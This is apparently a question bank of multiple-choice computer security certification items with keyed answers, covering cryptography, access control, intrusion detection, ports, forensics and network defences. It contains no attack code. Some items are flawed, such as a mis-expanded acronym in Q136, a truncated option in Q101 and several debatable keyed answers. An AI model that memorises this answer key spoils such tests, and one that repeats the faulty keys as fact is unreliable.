B#Compsec Q72. You have identified a number of risks to which your company's assets are exposed, and want to implement policies, procedures, and various security measures. In doing so, what will be your objective? 	^A. Eliminate every threat that may affect the business. 	^B. Manage the risks so that the problems resulting from them will be minimized. 	^C. Implement as many security measures as possible to address every risk that an asset may be exposed to. 	^D. Ignore as many risks as possible to keep costs down. 
B#Compsec Q73. Which of the following results in a domain name server resolving the domain name to a different and thus misdirecting Internet traffic? 	^A. DoS (Denial of Service) 	^B. Spoofing 	^C. Brute force attack 	^D. Reverse DNS (Domain Name Service) 
B,D#Compsec Q74. Active detection IDS systems may perform which of the following when an unauthorized connection attempt is discovered? (Choose all that apply) 	^A. Inform the attacker that he is connecting to a protected network. 	^B. Shut down the server or service. 	^C. Provide the attacker the usernames and passwords for administrative accounts. 	^D. Break off suspicious connections. 
A#Compsec Q75. Honey pots are useful in preventing attackers from gaining access to critical systems. True or false? 	^A. True 	^B. False 	^C. It depends on the style of attack used. 
D#Compsec Q76. An autonomous agent that copies itself into one or more host programs, then propagates when the host is run, is best described as a: 	^A. Trojan horse 	^B. Back door 	^C. Logic bomb 	^D. Virus 
C#Compsec Q77. What technology was originally designed to decrease broadcast traffic but is also beneficial in reducing the likelihood of having information compromised by sniffers? 	^A. VPN (Virtual Private Network) 	^B. DMZ (Demilitarized Zone) 	^C. VLAN (Virtual Local Area Network) 	^D. RADIUS (Remote Authentication Dial-in User Service) 
D#Compsec Q78. Of the following services, which one determines what a user can change or view? 	^A. Data integrity 	^B. Data confidentiality 	^C. Data authentication 	^D. Access control 
H#Compsec Q79. IMAP4 requires port ____ to be open. 	^A. 80 	^B. 3869 	^C. 22 	^D. 21 	^E. 23 ^F. 25 ^G. 110	^H. 143	^I. 443 
A#Compsec Q161. Message authentication codes are used to provide which service? 	^A. Integrity 	^B. Fault recovery 	^C. Key recovery 	^D. Acknowledgement 
D#Compsec Q162. When a change to user security policy is made, the policy maker should provide appropriate documentation to: 	^A. The security administrator. 	^B. Auditors 	^C. Users 	^D. All staff. 
B#Compsec Q163. A major difference between a worm and a Trojan horse program is: 	^A. Worms are spread via e-mail while Trojan horses are not. 	^B. Worms are self replicating while Trojan horses are not. 	^C. Worms are a form of malicious code while Trojan horses are not. 	^D. There is no difference. 
D#Compsec Q164. A common algorithm used to verify the integrity of data from a remote user through the creation of a 128-bit hash from a data input is: 	^A. IPSec (Internal Protocol Security) 	^B. RSA (Rivest Shamir Adleman) 	^C. Blowfish 	^D. MD5 (Message Digest 5) 
B#Compsec Q165. What is the best method of reducing vulnerability from dumpster diving? 	^A. Hiring additional security staff. 	^B. Destroying paper and other media. 	^C. Installing surveillance equipment. 	^D. Emptying the trash can frequently. 
C#Compsec Q166. What is the best method of defence against IP (Internet Protocol) spoofing attacks? 	^A. Deploying intrusion detection systems. 	^B. Creating a DMZ (Demilitarized Zone). 	^C. Applying ingress filtering to routers. 	^D. There is not a good defense against IP (Internet Protocol) spoofing. 
A#Compsec Q167. A need to know security policy would grant access based on: 	^A. Least privilege 	^B. Less privilege 	^C. Loss of privilege 	^D. Single privilege 
D#Compsec Q168. When a user digitally signs a document an asymmetric algorithm is used to encrypt: 	^A. Secret passkeys 	^B. File contents 	^C. Certificates 	^D. Hash results 
B#Compsec Q169. The best way to harden an application that is developed in house is to: 	^A. Use an industry recommended hardening tool. 	^B. Ensure that security is given due consideration throughout the entire development process. 	^C. Try attacking the application to detect vulnerabilities, then develop patches to fix any vulnerabilities found. 	^D. Ensure that the auditing system is comprehensive enough to detect and log any possible intrusion, identifying existing vulnerabilities. 
B#Compsec Q170. Security requirements for servers DO NOT typically include: 	^A. The absence of vulnerabilities used by known forms of attack against server hosts. 	^B. The ability to allow administrative activities to all users. 	^C. The ability to deny access to information on the server other than that intended to be available. 	^D. The ability to disable unnecessary network services that may be built into the operating system or server software. 
A#Compsec Q171. How can an e-mail administrator prevent malicious users from sending e-mails from non-existent domains? 	^A. Enable DNS (Domain Name Service) reverse lookup on the e-mail server. 	^B. Enable DNS (Domain Name Service) forward lookup on the e-mail server. 	^C. Enable DNS (Domain Name Service) recursive queries on the DNS (Domain Name Service) server. 	^D. Enable DNS (Domain Name Service) reoccurring queries on the DNS (Domain Name Service) 
D#Compsec Q172. A network attack that misuses TCP's (Transmission Control Protocol) three way handshake to overload servers and deny access to legitimate users is called a: 	^A. Man in the middle. 	^B. Smurf 	^C. Teardrop 	^D. SYN (Synchronize) 
A#Compsec Q173. Which of the following options describes a challenge-response session? 	^A. A workstation or system that generates a random challenge string that the user enters when prompted along with the proper PIN (Personal Identification Number). 	^B. A workstation or system that generates a random login ID that the user enters when prompted along with the proper PIN (Personal Identification Number). 	^C. A special hardware device that is used to generate random text in a cryptography system. 	^D. The authentication mechanism in the workstation or system does not determine if the owner should be authenticated. 
A#Compsec Q174. A server placed into service for the purpose of attracting a potential intruder's attention is known as a: 	^A. Honey pot 	^B. Lame duck 	^C. Teaser 	^D. Pigeon 
A#Compsec Q175. A network administrator wants to restrict internal access to other parts of the network. The network restrictions must be implemented with the least amount of administrative overhead and must be hardware based. ^  What is the best solution? 	^A. Implement firewalls between subnets to restrict access. 	^B. Implement a VLAN (Virtual Local Area Network) to restrict network access. 	^C. Implement a proxy server to restrict access. 	^D. Implement a VPN (Virtual Private Network). 
D#Compsec Q176. Which one of the following would most likely lead to a CGI (Common Gateway Interface) security problem? 	^A. HTTP (Hypertext Transfer Protocol) protocol. 	^B. Compiler or interpreter that runs the CGI (Common Gateway Interface) script. 	^C. The web browser. 	^D. External data supplied by the user. 
B#Compsec Q177. SSL (Secure Sockets Layer) session keys are available in what two lengths? 	^A. 40-bit and 64-bit. 	^B. 40-bit and 128-bit. 	^C. 64-bit and 128-bit. 	^D. 128-bit and 1,024-bit. 
B#Compsec Q92. Many intrusion detection systems look for known patterns or _____ to aid in detecting attacks. 	^A. Viruses 	^B. Signatures 	^C. Hackers 	^D. Malware 
B#Compsec Q93. What type of authentication may be needed when a stored key and memorized password are not strong enough and additional layers of security are needed? 	^A. Mutual 	^B. Multi-factor 	^C. Biometric 	^D. Certificate 
A,D#Compsec Q94. You are the first to arrive at a crime scene in which a hacker is accessing unauthorized data on a file server from across the network. To secure the scene, which of the following actions should you perform? 	^A. Prevent members of the organization from entering the server room. 	^B. Prevent members of the incident response team from entering the server room. 	^C. Shut down the server to prevent the user from accessing further data. 	^D. Detach the network cable from the server to prevent the user from accessing further data. 
D#Compsec Q95. You are the first person to arrive at a crime scene. An investigator and crime scene technician arrive afterwards to take over the investigation. ^  Which of the following tasks will the crime scene technician be responsible for performing? 	^A. Ensure that any documentation and evidence they possessed is handed over to the investigator. 	^B. Reestablish a perimeter as new evidence presents itself. 	^C. Establish a chain of command.	^D. Tag, bag, and inventory evidence. 
A#Compsec Q96. The de facto IT (Information Technology) security evaluation criteria for the international community is called? 	^A. Common Criteria 	^B. Global Criteria 	^C. TCSEC (Trusted Computer System Evaluation Criteria) 	^D. ITSEC (Information Technology Security Evaluation Criteria) 
C#Compsec Q97. Which of the following is a technical solution that supports high availability? 	^A. UDP (User Datagram Protocol) 	^B. Anti-virus solution 	^C. RAID (Redundant Array of Independent Disks) 	^D. Firewall 
C#Compsec Q98. Which of the following is an example of an asymmetric algorithm? 	^A. CAST (Carlisle Adams Stafford Tavares) 	^B. RC5 (Rivest Cipher 5) 	^C. RSA (Rivest Shamir Adleman) 	^D. SHA-1 (Secure Hashing Algorithm 1) 
B#Compsec Q99. Dave is increasing the security of his Web site by adding SSL (Secure Sockets Layer). Which type of encryption does SSL use? 	^A. Asymmetric 	^B. Symmetric 	^C. Public Key 	^D. Secret 
A#Compsec Q100. What would NOT improve the physical security of workstations? 	^A. Lockable cases, keyboards, and removable media drives. 	^B. Key or password protected configuration and setup. 	^C. Password required to boot. 	^D. Strong passwords. 
C#Compsec Q101. What are the four major components of ISAKMP (Internet Security Association and Key Management Protocol)? ^A. Authentication of peers, threat management, communication management, and cryptographic key establishment. ^B. Authentication of peers, threat management, communication management, and cryptographic key establishment and management. 	^C. Authentication of peers, threat management, security association creation and management, cryptographic key establishment and management.	^D management and cryptographic key management. 
D#Compsec Q102. Security training should emphasise that the weakest links in the security of an organization are typically: 	^A. Firewalls 	^B. Policies 	^C. Viruses 	^D. People 
C#Compsec Q103. IEEE (Institute of Electrical and Electronics Engineers) 802.11b is capable of providing data rates of up to: 	^A. 10 Mbps (Megabits per second) 	^B. 10.5 Mbps (Megabits per second) 	^C. 11 Mbps (Megabits per second) 	^D. 12 Mbps (Megabits per second) 
A#Compsec Q104. The standard encryption algorithm based on Rijndael is known as: 	^A. AES (Advanced Encryption Standard) 	^B. 3DES (Triple Data Encryption Standard) 	^C. DES (Data Encryption Standard) 	^D. Skipjack 
B#Compsec Q105. Security controls may become vulnerabilities in a system unless they are: 	^A. Designed and implemented by the system vendor. 	^B. Adequately tested. 	^C. Implemented at the application layer in the system. 	^D. Designed to use multiple factors of authentication. 
C#Compsec Q106. Which of the following is considered the best technical solution for reducing the threat of a man in the middle attack? 	^A. Virtual LAN (Local Area Network) 	^B. GRE (Generic Route Encapsulation) tunnel IPIP (Internet Protocol-within-Internet Protocol Encapsulation Protocol) 	^C. PKI (Public Key Infrastructure) 	^D. Enforcement of badge system 
A#Compsec Q107. Access controls based on security labels associated with each data item and each user are known as: 	^A. MACs (Mandatory Access Control) 	^B. RBACs (Role Based Access Control) 	^C. LBACs (List Based Access Control) 	^D. DACs (Discretionary Access Control) 
C#Compsec Q108. An extranet would be best defined as an area or zone: 	^A. Set aside for business to store extra servers for internal use. 	^B. Accessible to the general public for accessing the business web site. 	^C. That allows a business to securely transact with other businesses. 	^D. Added after the original network was built for additional storage. 
D#Compsec Q80. What are access decisions based on in a MAC (Mandatory Access Control) environment? 	^A. Access control lists 	^B. Ownership 	^C. Group membership 	^D. Sensitivity labels 
A#Compsec Q81. As the Security Analyst for your company's network, you want to implement AES. What algorithm will it use? 	^A. Rijndael 	^B. Nagle 	^C. Spanning Tree 	^D. PKI 
B#Compsec Q82. When securing an FTP (File Transfer Protocol) server, what can be done to ensure that only authorized users can access the server? 	^A. Allow blind authentication. 	^B. Disable anonymous authentication. 	^C. Redirect FTP (File Transfer Protocol) to another port. 	^D. Only give the address to users that need access. 
A#Compsec Q83. Asymmetric cryptography ensures that: 	^A. Encryption and authentication can take place without sharing private keys. 	^B. Encryption of the secret key is performed with the fastest algorithm available. 	^C. Encryption occurs only when both parties have been authenticated. 	^D. Encryption factoring is limited to the session key. 
B,C#Compsec Q84. You are promoting user awareness in forensics, so users will know what to do when incidents occur with their computers. ^  Which of the following tasks should you instruct users to perform when an incident occurs? (Choose all that apply) 	^A. Shut down the computer. 	^B. Contact the incident response team. 	^C. Document what they see on the screen. 	^D. Log off the network. 
B#Compsec Q85. When a session is initiated between the Transport Control Program (TCP) client and server in a network, a very small buffer space exists to handle the usually rapid hand-shaking exchange of messages that sets up the session. ^  What kind of attack exploits this functionality? 	^A. Buffer Overflow 	^B. SYN Attack 	^C. Smurf 	^D. Birthday Attack 
B#Compsec Q86. A program that can infect other programs by modifying them to include a version of itself is a: 	^A. Replicator 	^B. Virus 	^C. Trojan horse 	^D. Logic bomb 
C#Compsec Q87. A collection of information that includes login, file access, other various activities, and actual or attempted legitimate and unauthorized violations is a(n): 	^A. Audit 	^B. ACL (Access Control List) 	^C. Audit trail 	^D. Syslog 
A#Compsec Q88. Forensic procedures must be followed exactly to ensure the integrity of data obtained in an investigation. ^  When making copies of data from a machine that is being examined, which of the following tasks should be done to ensure it is an exact duplicate? 	^A. Perform a cyclic redundancy check using a checksum or hashing algorithm. 	^B. Change the attributes of data to make it read only. 	^C. Open files on the original media and compare them to the copied data. 	^D. Do nothing. Imaging software always makes an accurate image. 
D#Compsec Q89. DAC (Discretionary Access Control) systems operate under which of the following statements: 	^A. Files that don't have an owner CANNOT be modified. 	^B. The administrator of the system is an owner of each object. 	^C. The operating system is an owner of each object. 	^D. Each object has an owner, which has full control over the object. 
C#Compsec Q90. You have decided to implement biometrics as part of your security system. ^  Before purchasing a locking system that uses biometrics to control access to secure areas, you need to decide what will be used to authenticate users. ^  Which of the following options relies solely on biometric authentication? 	^A. Username and password. 	^B. Fingerprints, retinal scans, PIN numbers, and facial characteristics. 	^C. Voice patterns, fingerprints, and retinal scans. 	^D. Strong passwords, PIN numbers, and digital imaging. 
D#Compsec Q91. As the Security Analyst for your company's network, you want to implement Single Signon technology. ^  What benefit can you expect to get when implementing Single Signon? 	^A. You will need to log on twice at all times. 	^B. You can allow for system wide permissions with it. 	^C. You can install multiple applications. 	^D. You can browse multiple directories.
D#Compsec Q109. What authentication problem is addressed by single sign on? 	^A. Authorization through multiple servers. 	^B. Multiple domains. 	^C. Multi-factor authentication. 	^D. Multiple usernames and passwords. 
D#Compsec Q110. An administrator is concerned with viruses in e-mail attachments being distributed and inadvertently installed on users' workstations. If the administrator sets up an attachment filter, what types of attachments should be filtered from e-mails to minimize the danger of viruses? 	^A. Text file 	^B. Image files 	^C. Sound files 	^D. Executable files 
A#Compsec Q111. When an ActiveX control is executed, it executes with the privileges of the: 	^A. Current user account 	^B. Administrator account 	^C. Guest account 	^D. System account 
A#Compsec Q112. IDEA (International Data Encryption Algorithm), Blowfish, RC5 (Rivest Cipher 5) and CAST-128 are encryption algorithms of which type? 	^A. Symmetric 	^B. Asymmetric 	^C. Hashing 	^D. Elliptic curve 
C#Compsec Q113. An example of a physical access barrier would be: 	^A. Video surveillance 	^B. Personnel traffic pattern management 	^C. Security guard 	^D. Motion detector 
C#Compsec Q114. Which of the following is likely to be found after enabling anonymous FTP (File Transfer Protocol) read/write access? 	^A. An upload and download directory for each user. 	^B. Detailed logging information for each user. 	^C. Storage and distribution of unlicensed software. 	^D. Fewer server connections and less network bandwidth utilization. 
C#Compsec Q115. A network attack method that uses ICMP (Internet Control Message Protocol) and improperly formatted MTUs (Maximum Transmission Unit) to crash a target computer is known as a: 	^A. Man in the middle attack 	^B. Smurf attack 	^C. Ping of death attack 	^D. TCP SYN (Transmission Control Protocol / Synchronized) attack 
c#Compsec Q116. What is NOT an acceptable use for smart card technology? 	^A. Mobile telephones 	^B. Satellite television access cards 	^C. A PKI (Public Key Infrastructure) token card shared by multiple users 	^D. Credit cards 
B#Compsec Q117. An effective method of preventing computer viruses from spreading is to: 	^A. Require root/administrator access to run programs. 	^B. Enable scanning of e-mail attachments. 	^C. Prevent the execution of .vbs files. 	^D. Install a host based IDS (Intrusion Detection System) 
A#Compsec Q118. A PKI (Public Key Infrastructure) document that serves as the vehicle on which to base common interoperability standards and common assurance criteria on an industry wide basis is a certificate: 	^A. Policy 	^B. Practice 	^C. Procedure 	^D. Process 
C#Compsec Q119. Currently, the most costly method of authentication is the use of: 	^A. Passwords 	^B. Tokens 	^C. Biometrics 	^D. Shared secrets 
D#Compsec Q120. Which systems should be included in a disaster recovery plan? 	^A. All systems. 	^B. Those identified by the board of directors, president or owner. 	^C. Financial systems and human resources systems. 	^D. Systems identified in a formal risk analysis process. 
C#Compsec Q121. What is the best defence against man in the middle attacks? 	^A. A firewall 	^B. Strong encryption 	^C. Strong authentication 	^D. Strong passwords 
A#Compsec Q122. One of the most effective ways for an administrator to determine what security holes reside on a network is to: 	^A. Perform a vulnerability assessment. 	^B. Run a port scan. 	^C. Run a sniffer. 	^D. Install and monitor an IDS (Intrusion Detection System) 
D#Compsec Q123. Analyzing log files after an attack has started is an example of: 	^A. Active detection 	^B. Overt detection 	^C. Covert detection 	^D. Passive detection 
D#Compsec Q124. A malformed MIME (Multipurpose Internet Mail Extensions) header can: 	^A. Create a back door that will allow an attacker free access to a company's private network. 	^B. Create a virus that infects a user's computer. 	^C. Cause an unauthorized disclosure of private information. 	^D. Cause an e-mail server to crash. 
D#Compsec Q125. An attacker can determine what network services are enabled on a target system by: 	^A. Installing a rootkit on the target system. 	^B. Checking the services file. 	^C. Enabling logging on the target system. 	^D. Running a port scan against the target system. 
C#Compsec Q126. What type of attack CANNOT be detected by an IDS (Intrusion Detection System)? 	^A. DoS (Denial of Service) 	^B. Exploits of bugs or hidden features 	^C. Spoofed e-mail 	^D. Port scan 
D#Compsec Q127. Regarding security, biometrics are used for. 	^A. Accountability 	^B. Certification 	^C. Authorization 	^D. Authentication 
D#Compsec Q128. What is the most effective social engineering defence strategy? 	^A. Marking of documents 	^B. Escorting of guests 	^C. Badge security system 	^D. Training and awareness 
B#Compsec Q129. A security administrator tasked with confining sensitive data traffic to a specific subnet would do so by manipulating privilege policy based tables in the network's: 	^A. Server 	^B. Router 	^C. VPN (Virtual Private Network) 	^D. Switch 
A#Compsec Q130. For system logging to be an effective security measure, an administrator must: 	^A. Review the logs on a regular basis. 	^B. Implement circular logging. 	^C. Configure the system to shutdown when the logs are full. 	^D. Configure SNMP (Simple Network Management Protocol) traps for logging events. 
A#Compsec Q131. With regards to the use of Instant Messaging, which of the following types of attack strategies is effectively combated with user awareness training? 	^A. Social engineering 	^B. Stealth 	^C. Ambush 	^D. Multi-prolonged 
B#Compsec Q132. The process by which remote users can make a secure connection to internal resources after establishing an Internet connection could correctly be referred to as: 	^A. Channeling 	^B. Tunneling 	^C. Throughput 	^D. Forwarding 
C#Compsec Q133. Appropriate documentation of a security incident is important for each of the following reasons EXCEPT: 	^A. The documentation serves as a lessons learned which may help avoid further exploitation of the same vulnerability. 	^B. The documentation will serve as an aid to updating policy and procedure. 	^C. The documentation will indicate who should be fired for the incident. 	^D. The documentation will serve as a tool to assess the impact and damage for the incident. 
A#Compsec Q134. Assuring the recipient that a message has not been altered in transit is an example of which of the following: 	^A. Integrity 	^B. Static assurance 	^C. Dynamic assurance 	^D. Cyclical check sequence 
D#Compsec Q135. Which of the following is expected network behaviour? 	^A. Traffic coming from or going to unexpected locations. 	^B. Non-standard or malformed packets/protocol violations. 	^C. Repeated, failed connection attempts. 	^D. Changes in network performance such as variations in traffic load. 
D#Compsec Q136. Which of the following steps in the SSL (Secure Socket Layer) protocol allows for client and server authentication, MAC (Mandatory Access Control) and encryption algorithm negotiation, and selection of cryptographic keys? 	^A. SSL (Secure Sockets Layer) alert protocol. 	^B. SSL (Secure Sockets Layer) change cipher spec protocol. 	^C. SSL (Secure Sockets Layer) record protocol. 	^D. SSL (Secure Sockets Layer) handshake protocol. 
B#Compsec Q137. Which of the following correctly identifies some of the contents of a user's X.509 certificate? 	^A. User's public key, object identifiers, and the location of the user's electronic identity. 	^B. User's public key, the CA (Certificate Authority) distinguished name, and the type of symmetric algorithm used for encryption. 	^C. User's public key, the certificate's serial number, and the certificate's validity dates. 	^D. User's public key, the serial number of the CA (Certificate Authority) certificate, and the CRL (Certificate Revocation List) entry point. 
D#Compsec Q138. An organization is implementing Kerberos as its primary authentication protocol. Which of the following must be deployed for Kerberos to function properly? 	^A. Dynamic IP (Internet Protocol) routing protocols for routers and servers. 	^B. Separate network segments for the realms. 	^C. Token authentication devices. 	^D. Time synchronization services for clients and servers. 
D#Compsec Q139. The WAP (Wireless Application Protocol) programming model is based on the following three elements: 	^A. Client, original server, WEP (Wired Equivalent Privacy) 	^B. Code design, code review, documentation 	^C. Client, original server, wireless interface card 	^D. Client, gateway, original server 
A#Compsec Q140. Technical security measures and countermeasures are primarily intended to prevent: 	^A. Unauthorized access, unauthorized modification, and denial of authorized access. 	^B. Interoperability of the framework, unauthorized modification, and denial of authorized access. 	^C. Potential discovery of access, interoperability of the framework, and denial of authorized access. 	^D. Interoperability of the framework, unauthorized modification, and unauthorized access. 
C#Compsec Q141. Poor programming techniques and lack of code review can lead to which of the following types of attack? 	^A. CGI (Common Gateway Interface) script 	^B. Birthday 	^C. Buffer overflow 	^D. Dictionary 
B#Compsec Q142. Which of the following is NOT a characteristic of DEN (Directory Enabled Networking)? 	^A. It is mapped into the directory defined as part of the LDAP (Lightweight Directory Access Protocol). 	^B. It is inferior to SNMP (Simple Network Management Protocol). 	^C. It is an object oriented information model. 	^D. It is an industry standard indicating how to construct and store information about a network's users, applications and data. 
B#Compsec Q143. Privileged accounts are most vulnerable immediately after a: 	^A. Successful remote login. 	^B. Privileged user is terminated. 	^C. Default installation is performed. 	^D. Full system backup is performed. 
C#Compsec Q144. What is the advantage of a multi-homed firewall? 	^A. It is relatively inexpensive to implement. 	^B. The firewall rules are easier to manage. 	^C. If the firewall is compromised, only the systems in the DMZ (Demilitarized Zone) are exposed. 	^D. An attacker must circumvent two firewalls. 
B#Compsec Q145. A password security policy can help a system administrator to decrease the probability that a password can be guessed by reducing the password's: 	^A. Length 	^B. Lifetime 	^C. Encryption level 	^D. Alphabet set 
A#Compsec Q146. An inherent flaw of DAC (Discretionary Access Control) relating to security is: 	^A. DAC (Discretionary Access Control) relies only on the identity of the user or process, leaving room for a Trojan horse. 	^B. DAC (Discretionary Access Control) relies on certificates, allowing attackers to use those certificates. 	^C. DAC (Discretionary Access Control) does not rely on the identity of a user, allowing anyone to use an account. 	^D. DAC (Discretionary Access Control) has no known security flaws. 
A#Compsec Q147. What is the most common method used by attackers to identify the presence of an 801.11b network? 	^A. War driving 	^B. Direct inward dialing	^C. War dialing 	^D. Packet driving 
B#Compsec Q148. The best method to use for protecting a password stored on the server used for user authentication is to: 	^A. Store the server password in clear text. 	^B. Hash the server password. 	^C. Encrypt the server password with asymmetric keys. 	^D. Encrypt the server password with a public key. 
D#Compsec Q149. During the digital signature process, asymmetric cryptography satisfies what security requirement? 	^A. Confidentiality 	^B. Access control 	^C. Data integrity 	^D. Authentication 
A#Compsec Q150. The most effective way an administrator can protect users from social engineering is: 	^A. Education 	^B. Implement personal firewalls. 	^C. Enable logging on at users' desktops. 	^D. Monitor the network with an IDS (Intrusion Detection System) 
C#Compsec Q151. The action of determining which operating system is installed on a system simply by analyzing its response to certain network traffic is called: 	^A. OS (Operating System) scanning. 	^B. Reverse engineering. 	^C. Fingerprinting 	^D. Host hijacking. 
C#Compsec Q152. One of the factors that influence the lifespan of a public key certificate and its associated keys is the: 	^A. Value of the information it is used to protect. 	^B. Cost and management fees. 	^C. Length of the asymmetric hash. 	^D. Data available openly on the cryptographic system. 
B#Compsec Q153. A DRP (Disaster Recovery Plan) typically includes which of the following: 	^A. Penetration testing. 	^B. Risk assessment. 	^C. DoS (Denial of Service) attack. 	^D. ACLs (Access Control List). 
A#Compsec Q154. Which of the following is the best description of separation of duties? 	^A. Assigning different parts of tasks to different employees. 	^B. Employees are granted only the privileges necessary to perform their tasks. 	^C. Each employee is granted specific information that is required to carry out the job function. 	^D. Screening employees before assigning them to a position. 
D#Compsec Q155. Which of the following is a popular VPN (Virtual Private Network) protocol operating at OSI (Open Systems Interconnect) model Layer 3? 	^A. PPP (Point-to-Point Protocol) 	^B. SSL (Secure Sockets Layer) 	^C. L2TP (Layer Two Tunneling Protocol) 	^D. IPSec (Internet Protocol Security) 
C#Compsec Q156. The system administrator has just used a program that highlighted the susceptibility of several servers on the network to various exploits. The program also suggested fixes. What type of program was used? 	^A. Intrusion detection 	^B. Port scanner 	^C. Vulnerability scanner 	^D. Trojan scanner 
C#Compsec Q157. Which protocol is typically used for encrypting traffic between a web browser and web server? 	^A. IPSec (Internet Protocol Security) 	^B. HTTP (Hypertext Transfer Protocol) 	^C. SSL (Secure Sockets Layer) 	^D. VPN (Virtual Private Network) 
D#Compsec Q158. What fingerprinting technique relies on the fact that operating systems differ in the amount of information that is quoted when ICMP (Internet Control Message Protocol) errors are encountered? 	^A. TCP (Transmission Control Protocol) options. 	^B. ICMP (Internet Control Message Protocol) error message quenching. 	^C. Fragmentation handling. 	^D. ICMP (Internet Control Message Protocol) message quoting. 
C#Compsec Q159. Incorrectly detecting authorized access as an intrusion or attack is called a false: 	^A. Negative 	^B. Intrusion 	^C. Positive 	^D. Alarm 
C#Compsec Q160. When hardening a machine against external attacks, what process should be followed when disabling services? 	^A. Disable services such as DHCP (Dynamic Host Configuration Protocol) client and print servers from servers that do not use/serve those functions. 	^B. Disable one unnecessary service after another, while reviewing the effects of the previous action. 	^C. Research the services and their dependencies before disabling any default services. 	^D. Disable services not directly related to financial operations.
B#Compsec Q178. Which access control method provides the most granular access to protected objects? 	^A. Capabilities 	^B. Access control lists 	^C. Permission bits 	^D. Profiles 
B#Compsec Q179. The primary DISADVANTAGE of symmetric cryptography is: 	^A. Speed 	^B. Key distribution 	^C. Weak algorithms 	^D. Memory management 
C#Compsec Q180. Missing audit log entries most seriously affect an organization's ability to: 	^A. Recover destroyed data. 	^B. Legally prosecute an attacker. 	^C. Evaluate system vulnerabilities. 	^D. Create reliable system backups. 
A#Compsec Q181. File encryption using symmetric cryptography satisfies what security requirement? 	^A. Confidentiality 	^B. Access control 	^C. Data integrity 	^D. Authentication 
D#Compsec Q182. Which of the following provides privacy, data integrity and authentication for handheld devices in a wireless network environment? 	^A. WEP (Wired Equivalent Privacy) 	^B. WAP (Wireless Application Protocol) 	^C. WSET (Wireless Secure Electronic Transaction) 	^D. WTLS (Wireless Transport Layer Security) 
C#Compsec Q183. The integrity of a cryptographic system is considered compromised if which of the following conditions exist? 	^A. A 40-bit algorithm is used for a large financial transaction. 	^B. The public key is disclosed. 	^C. The private key is disclosed. 	^D. The validity of the data source is compromised. 
C#Compsec Q184. The system administrator concerned about security has designated a special area in which to place the web server away from other servers on the network. This area is commonly known as the? 	^A. Honey pot 	^B. Hybrid subnet 	^C. DMZ (Demilitarized Zone) 	^D. VLAN (Virtual Local Area Network) 
D#Compsec Q185. An administrator of a web server notices many port scans to a server. To limit exposure and vulnerability exposed by these port scans the administrator should: 	^A. Disable the ability to remotely scan the registry. 	^B. Leave all processes running for possible future use. 	^C. Close all programs or processes that use a UDP (User Datagram Protocol) or TCP (Transmission Control Protocol) port. 	^D. Uninstall or disable any programs or processes that are not needed for the proper use of the server. 
D#Compsec Q186. Which encryption scheme relies on both the sender and receiver to use different keys to encrypt and decrypt messages? 	^A. Symmetric 	^B. Blowfish 	^C. Skipjack 	^D. Asymmetric 
B#Compsec Q187. Which tunneling protocol only works on IP networks? 	^A. IPX 	^B. L2TP 	^C. PPTP 	^D. SSH 
D#Compsec Q188. What functionality should be disallowed between a DNS server and untrusted node? 	^A. name resolutions 	^B. reverse ARP requests 	^C. system name resolutions 	^D. zone transfers 
A#Compsec Q189. A document written by the CEO that outlines PKI use, management and deployment is a... 	^A. PKI policy 	^B. PKI procedure 	^C. PKI practice 	^D. best practices guideline 
A#Compsec Q190. Which one does not use Smart Card Technology? 	^A. CD Player 	^B. Cell Phone 	^C. Satellite Cards 	^D. Handheld Computer 
B#Compsec Q191. What port does SNMP use? 	^A. 21 	^B. 161 	^C. 53 	^D. 49 
D#Compsec Q192. What port does TACACS use? 	^A. 21 	^B. 161 	^C. 53 	^D. 49 
B#Compsec Q193. The first step in establishing a disaster recovery plan is to: 	^A. get budgetary approval for the plan. 	^B. agree on the objectives of the plan. 	^C. list possible alternative sites to be used in a disaster event. 	^D. prioritize processes requiring immediate attention in a disaster event. 
C#Compsec Q194. When securing a DNS (Domain Name Service) server, and shutting down all unnecessary ports, which port should NOT be shut down? 	^A. 21 	^B. 23 	^C. 53 	^D. 55 
B#Compsec Q195. What is the main advantage SSL (Secure Sockets Layer) has over HTTPS (Hypertext Transfer Protocol over Secure Sockets Layer)? 	^A. SSL (Secure Sockets Layer) offers full application security for HTTP (Hypertext Transfer Protocol) while HTTPS (Hypertext Transfer Protocol over Secure Sockets Layer) does not. 	^B. SSL (Secure Sockets Layer) supports additional application layer protocols such as FTP (File Transfer Protocol) and NNTP (Network News Transport Protocol) while HTTPS (Hypertext Transfer Protocol over Secure Sockets Layer) does not. 	^C. SSL (Secure Sockets Layer) and Https (Hypertext Transfer Protocol over Secure Sockets Layer) are transparent to the application. 	^D. SSL (Secure Sockets Layer) supports user authentication and HTTPS (Hypertext Transfer Protocol over Secure Sockets Layer) does not. 
A#Compsec Q196. A sound security policy will define: 	^A. what is considered an organization's assets. 	^B. what attacks are planned against the organization. 	^C. how an organization compares to others in security audits. 	^D. weaknesses in competitors' systems. 
A#Compsec Q197. An IDS (Intrusion Detection System) is sending alerts that attacks are occurring which are not actually taking place. What is the IDS (Intrusion Detection System) registering? 	^A. false positives. 	^B. false negatives. 	^C. true negatives. 	^D. true positives. 
C#Compsec Q198. When an employee is dismissed, the security administrator should: 	^A. allow the employee to backup computer files then disable network access. 	^B. change all network passwords. 	^C. disable the employee's network access. 	^D. set rules to forward the employee's e-mail to a home address. 
B#Compsec Q199. How are honey pots used to collect information? Honey pots collect: 	^A. IP (Internet Protocol) addresses and identity of internal users. 	^B. data on the identity, access, and compromise methods used by the intruder. 	^C. data regarding and the identity of servers within the network. 	^D. IP (Internet Protocol) addresses and data of firewalls used within the network. 
D#Compsec Q200. How must a firewall be configured to only allow employees within the company to download files from a FTP (File Transfer Protocol) server? 	^A. open port 119 to all inbound connections. 	^B. open port 119 to all outbound connections. 	^C. open port 20/21 to all inbound connections. 	^D. open port 20/21 to all outbound connections. 
C#Compsec Q201. Administrators currently use telnet to remotely manage several servers. ^  Security policy dictates that passwords and administrative activities must not be communicated in clear text. Which of the following is the best alternative to using telnet? 	^A. DES (Data Encryption Standard).	^B. S-Telnet. 	^C. SSH (Secure Shell). 	^D. PKI (Public Key Infrastructure). 
D#Compsec Q202. An acceptable use policy signed by an employee can be interpreted as an employee's written______ for allowing an employer to search an employee's workstation. 	^A. refusal. 	^B. policy. 	^C. guideline. 	^D. consent. 
B#Compsec Q203. What protocol can be used to create a VPN (Virtual Private Network)? 	^A. PPP (Point-to-Point Protocol). 	^B. PPTP (Point-to-Point Tunneling Protocol). 	^C. SLIP (Serial Line Internet Protocol). 	^D. ESLIP (Encrypted Serial Line Internet Protocol). 
